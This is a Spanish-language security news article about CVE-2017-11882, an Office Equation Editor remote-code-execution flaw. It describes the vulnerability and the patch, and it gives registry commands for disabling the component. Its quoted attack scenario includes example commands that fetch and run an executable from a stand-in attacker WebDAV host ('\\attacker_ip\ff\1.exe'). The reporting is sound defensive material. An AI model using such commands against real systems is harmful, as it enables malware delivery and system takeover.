Con el parche de este mes Microsoft ha solucionado esta vulnerabilidad
Debes tener mucho cuidado al abrir archivos en MS Office.
Cuando el mundo todavía está lidiando con la amenaza de la función DDE incorporada 'sin parches' de Microsoft Office, los investigadores han descubierto un grave problema con otro componente de Office que podría permitir a los atacantes instalar malware de forma remota en computadoras específicas.
La vulnerabilidad es un problema de corrupción de memoria que reside en todas las versiones de Microsoft Office publicadas en los últimos 17 años, incluido Microsoft Office 365, y funciona en todas las versiones del sistema operativo Windows, incluida la última actualización de Microsoft Windows 10 Creators.
Descubierta por los investigadores de seguridad de Embedi, la vulnerabilidad conduce a la ejecución remota de código, lo que permite que un atacante remoto no autenticado ejecute código malicioso en un sistema de destino sin requerir la interacción del usuario después de abrir un documento malicioso.
La vulnerabilidad, identificada como CVE-2017-11882, reside en EQNEDT32.EXE, un componente de MS Office que se encarga de la inserción y edición de ecuaciones (objetos OLE) en los documentos.
Sin embargo, debido a las operaciones de memoria inadecuadas, el componente no maneja adecuadamente los objetos en la memoria, corrompiéndola de tal manera que el atacante podría ejecutar código malicioso en el contexto del usuario que inició sesión.
Hace 17 años, EQNEDT32.EXE se introdujo en Microsoft Office 2000 y se mantuvo en todas las versiones publicadas después de Microsoft Office 2007 para garantizar que el software siga siendo compatible con los documentos de versiones anteriores.
DEMO: Explotación permite que se haga cargo del sistema completo:
La explotación de esta vulnerabilidad requiere abrir un archivo malicioso especialmente diseñado con una versión afectada de Microsoft Office o el software Microsoft WordPad.
Esta vulnerabilidad podría aprovecharse para tomar el control completo de un sistema cuando se combina con los exploits de escalamiento de privilegios del Kernel de Windows (como CVE-2017-11847).
Posible escenario de ataque:
Mientras explicaban el alcance de la vulnerabilidad, los investigadores de Embedi sugirieron varios escenarios de ataque enumerados a continuación:
"Al insertar varios OLE que explotaron la vulnerabilidad descrita, fue posible ejecutar una secuencia arbitraria de comandos (por ejemplo, para descargar un archivo arbitrario de Internet y ejecutarlo)".
"Una de las formas más fáciles de ejecutar código arbitrario es ejecutar un archivo ejecutable desde el servidor WebDAV controlado por un atacante".
"Sin embargo, un atacante puede usar la vulnerabilidad descrita para ejecutar comandos como cmd.exe /c start \\attacker_ip\ff. Dicho comando se puede usar como parte de un exploit y activa el inicio de WebClient".
"Después de eso, un atacante puede iniciar un archivo ejecutable desde el servidor WebDAV utilizando el comando \\attacker_ip\ff\1.exe. El mecanismo de inicio de un archivo ejecutable es similar al de \\live.sysinternals.com\tools service".
Protección contra la vulnerabilidad de Microsoft Office
Con el parche de este mes, Microsoft ha solucionado esta vulnerabilidad cambiando la forma en que el software afectado maneja los objetos en la memoria.
Por lo tanto, se recomienda encarecidamente a los usuarios aplicar lo antes posible los parches de seguridad de noviembre para evitar que hackers y cibercriminales tomen el control de sus computadoras.
Dado que este componente tiene una serie de problemas de seguridad que se pueden explotar fácilmente, deshabilitarlo podría ser la mejor manera de garantizar la seguridad de tu sistema.
Los usuarios pueden ejecutar el siguiente comando en el símbolo del sistema para deshabilitar el registro del componente en el registro de Windows:
reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Para el paquete de 32 bits de Microsoft Office en el sistema operativo x64, ejecuta el siguiente comando:
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Además de esto, los usuarios también deben habilitar la Vista Protegida (entorno limitado de Microsoft Office) para evitar la ejecución de contenido activo (OLE/ActiveX/Macro).
